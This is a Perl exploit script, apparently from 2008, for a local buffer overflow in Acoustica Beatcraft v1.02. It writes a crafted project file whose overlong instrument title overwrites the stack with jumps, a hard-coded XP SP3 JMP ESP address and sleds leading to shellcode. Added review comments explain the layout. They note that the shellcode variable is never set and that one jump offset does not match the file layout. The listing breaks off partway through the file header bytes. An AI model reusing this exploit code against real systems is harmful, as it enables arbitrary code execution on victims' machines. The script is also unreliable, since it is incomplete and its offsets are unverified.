#!/usr/bin/perl
#
# Acoustica Beatcraft (bcproj file) Local BOF Exploit
# Author: Koshi
#
# Date: 08-30-08 ( 0day )
# Application: Acoustica Beatcraft
# Version(s): v1.02 Build 19
# Site: http://acoustica.com/beatcraft/index.htm
# Tested On: Windows XP SP3 Fully Patched
#
# Acoustica Beatcraft holds the "title" of each "instrument" in a project
# in a buffer that an overly long string overflows. This exploit is
# somewhat unstable: to get code execution, start Beatcraft first and then
# open the generated project file from within the application. Simply
# double-clicking the file only crashes Beatcraft (a DoS). Hopefully that
# can be fixed later, but at present it seems unlikely that both launch
# paths can be made to work.
#
# gr33tz: Rima my baby, str0ke, breaker_unit, mess'
#
# Payload layout. Offsets are positions within $buff as written to the
# file and follow only from the lengths used here; they are not verified
# against the target's in-memory layout.
#
#   [0..288]    289 x 0x41 -- 179 overflow bytes followed by a 110-byte
#                sled (0x41 decodes as INC ECX, so the filler is executable).
#   [289..290]  EB 07 -- short JMP over the next 7 bytes (the 4-byte
#                address, the 2-byte second jump and one sled byte).
#   [291..294]  0x7C941EED -- JMP ESP in ntdll.dll, hard-coded for the
#                XP SP3 build named in the header; any other OS/build
#                needs a different JMP ESP address.
#   [295..296]  EB 31 -- short JMP forward 0x31 bytes toward the sled.
#                By file offsets alone 297 + 0x31 = 346, which is 15
#                bytes past the end of $led2; the original author says it
#                lands in the sled, so the stack layout presumably differs
#                from the file layout -- unverified.
#   [297..330]  34 x 0x41 -- second sled leading into $shellcode.
#   [331.. ]    $shellcode.
#
# NOTE(review): $shellcode is not assigned anywhere above this point in
# the file. Without `use strict` it is an empty package global here, so
# $buff is built with no payload unless $shellcode is set before this
# statement (and under `use strict` this line would not compile).
my $led1 = 'A' x 110;   # first sled
my $led2 = 'A' x 34;    # second sled
my $buf1 = 'A' x 179;   # bytes needed to reach the overwrite
my $buff = join '',
    $buf1,
    $led1,
    "\xeb\x07",          # JMP +7: skip the address and the second jump
    "\xed\x1e\x94\x7c",  # ntdll.dll JMP ESP (XP SP3) -- build specific
    "\xeb\x31",          # JMP +0x31
    $led2,
    $shellcode;
my $tuff = "".
"\x52\x49\x46\x46\xB0\x0F\x00\x00\x62\x65\x61\x74\x62\x70\x72\x6F\x30\x02\x00\x00".
"\xCD\xCC\x8C\x3F\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x20\x61\x6E\x64".
"\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x4F\x77\x6E\x65\x72\x5C\x44\x65\x73\x6B".
"\x74\x6F\x70\x5C\x70\x6F\x63\x2E\x62\x63\x70\x72\x6F\x6A\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".